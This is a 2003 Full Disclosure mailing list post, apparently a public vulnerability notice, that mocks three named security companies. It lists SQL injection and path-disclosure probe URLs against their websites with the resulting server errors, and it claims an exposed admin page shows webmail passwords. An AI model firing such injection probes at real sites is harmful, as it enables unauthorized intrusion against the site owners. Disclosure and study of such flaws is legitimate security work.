Full Disclosure mailing list archives
@(#)Mordred Labs security notice - exploring the security companies
From: Sir Mordred <mordred () s-mail com>
Date: Wed, 07 May 2003 15:47:00 +0000
// @(#)Mordred Labs security notice 0x0002 Name: Exploring the security companies (part one) Release date: May 7, 2003 Author: Sir Mordred (mordred () s-mail com) I. INTRODUCTION This is a first part of security notice about security companies. I'd split the original notice because of the amount information contained in it. The main topic of this notice is "bad coding habits", next time maybe we will talk about security audit and the source code audit in particular. Also i should say - somehow i fell respect to people, who are doing security and brave enough to build a website with a dynamic content, not just a couple of html pages. But sometimes crazy thought crosses my mind - maybe it is just a dumb honeypot? :-) The format for vulnerabilities is: <number>) [hostname, the company name] quotes, comments (if exists) * ISSUE <number> - description of the vulnerability blank line comments (if exists) blank line the url to demonstrate this vulnerability blank line the error message (if exists) II. DETAILS Now lets begin from the rather interesting security company "e-matters", and a couple of minutes brings us a several nice issues: 1) [ www.e-matters.de, e-matters ] Though i do not understand German :-) it was very exciting to visit e-matters website. I thought - well, there is Stefan Esser out there, respected security expert and PHP developer, now i am gonna actually visit his company's website, and if i am happy enough and if the website has some dynamic content i may find something very interesting ... i will be changing url parameters, puting single quotes, commas and all such shit ... :-) Then i got interested in their flagship product - Webmail 3.0 as it has demo account, and this brings us Issue 4. Well, it was a real fun i should say, have you ever see the broken test.php page? I did not. How about customers.html page? I think if i was going to buy some e-matters products, i'd run away from this site: * ISSUE 1 - /customers.html page is broken Somehow this page is very broken and when you visit http://www.e-matters.de/customers.html you can see something like this: Warning: mysql_pconnect(): Access denied for user: 'root@localhost' (Using password: YES) in /domains/e-matters.de/ftp/html/customers.html on line 17 Warning: mysql_select_db(): supplied argument is not a valid MySQL-Link resource in /domains/e-matters.de/ftp/html/customers.html on line 18 Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in /domains/e-matters.de/ftp/html/customers.html on line 20 Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /domains/e-matters.de/ftp/html/customers.html on line 21 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /domains/e-matters.de/ftp/html/customers.html on line 34 * ISSUE 2 - Path disclosure in /screenshotPopUp.html http://www.e-matters.de/screenshotPopUp.html?INC=w&ID=1& Warning: main(./screenshots/wwebmail.inc.php): failed to open stream: No such file or directory in /domains/e-matters.de/ftp/html/screenshotPopUp.html on line 15 Warning: main(): Failed opening './screenshots/w.inc.php' for inclusion (include_path='.:/usr/local/lib/php') in /domains/e-matters.de/ftp/html/screenshotPopUp.html on line 15 * ISSUE 3 - Path disclosure in /test.php page http://webmail.e-matters.de/test.php Parse error: parse error in /domains/e-matters.de/ftp/html/webmail/test.php on line 4 * ISSUE 4 - Admin access to webmail.e-matters.de interface The url http://webmail.e-matters.de/admin/ will happily display all users along with their passwords. 2) [ www.ca.com, Computer Associates ] <quote> CA is a $3 billion revenue enterprise software company, providing business-critical technology that serves as the backbone of commerce and shapes the way business is conducted throughout the world. </quote> * ISSUE 1 - SQL injection in /quotes/quotelist.asp page http://www3.ca.com/quotes/quotelist.asp?AT=1,'1&SOL=1&AR=&CP= Microsoft OLE DB Provider for SQL Server error '80040e14' Line 1: Incorrect syntax near ','. /common/include/caADO.asp, line 243 * ISSUE 2 - Another SQL injection in /qoutes/quotelist.asp page http://www3.ca.com/quotes/quotelist.asp?AT=1&SOL=1,1&AR=&CP= Microsoft OLE DB Provider for SQL Server error '80040e14' Line 1: Incorrect syntax near '1'. /common/include/caADO.asp, line 243 * ISSUE 3 - Another SQL injection in /quotes/quotelist.asp page http://www3.ca.com/quotes/quotelist.asp?AT=1&SOL=1&AR=&CP=,' Microsoft OLE DB Provider for SQL Server error '80040e14' Line 1: Incorrect syntax near ','. /common/include/caADO.asp, line 243 * ISSUE 4 - Yet another SQL injection in /quotes/quotelist.asp page http://www3.ca.com/quotes/quotelist.asp?AT=1&SOL=1&AR='88&CP=20099 Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string '88)) AND q.FKComp_ID = 20099 ORDER BY co.Comp_Name, Quotes_Date DESC'. /common/include/caADO.asp, line 243 3) [ www.netegrity.com, Netegrity Inc. ] <quote> Netegrity, Inc. is a leading provider of security software solutions that securely manage identities and their access to enterprise information assets, letting business in while keeping risk out. Netegrity provides a comprehensive identity and access management product line for continuously evolving computing environments, including legacy, Web, and service-oriented architectures. </quote> * ISSUE 1 - SQL injection in /News/feature.cfm page http://www.netegrity.com/News/feature.cfm?ArticleID=1, ODBC Error Code = 37000 (Syntax error or access violation) [Microsoft][ODBC SQL Server Driver][SQL Server]Line 7: Incorrect syntax near ','. The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (24:1) to (24:55). * ISSUE 2 - SQL injection in /News/PressRelease.cfm page http://www.netegrity.com/News/PressRelease.cfm?ArticleId=1,1&leveltwo=PressR eleases ODBC Error Code = 37000 (Syntax error or access violation) [Microsoft][ODBC SQL Server Driver][SQL Server]Line 6: Incorrect syntax near ','. The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (24:1) to (24:55). * ISSUE 3 - Path disclosure http://www.netegrity.com/News/PressRelease_Archive.cfm?levelthree=2000&relea se=nul Cannot open CFML file The requested file "C:\INETPUB\WWWROOT\2001\NEWS\ARCHIVE\DOM\2000\NUL.HTML" cannot be found. The specific sequence of files included or processed is: C:\INETPUB\WWWROOT\2001\NEWS\PRESSRELEASE_ARCHIVE.CFM C:\INETPUB\WWWROOT\2001\NEWS\ARCHIVE\DOM\2000\NUL.HTML CFInclude The error occurred while processing an element with a general identifier of (CFINCLUDE), occupying document position (44:2) to (44:32). ________________________________________________________________________ This letter has been delivered unencrypted. We'd like to remind you that the full protection of e-mail correspondence is provided by S-mail encryption mechanisms if only both, Sender and Recipient use S-mail. Register at S-mail.com: http://www.s-mail.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- @(#)Mordred Labs security notice - exploring the security companies Sir Mordred (May 07)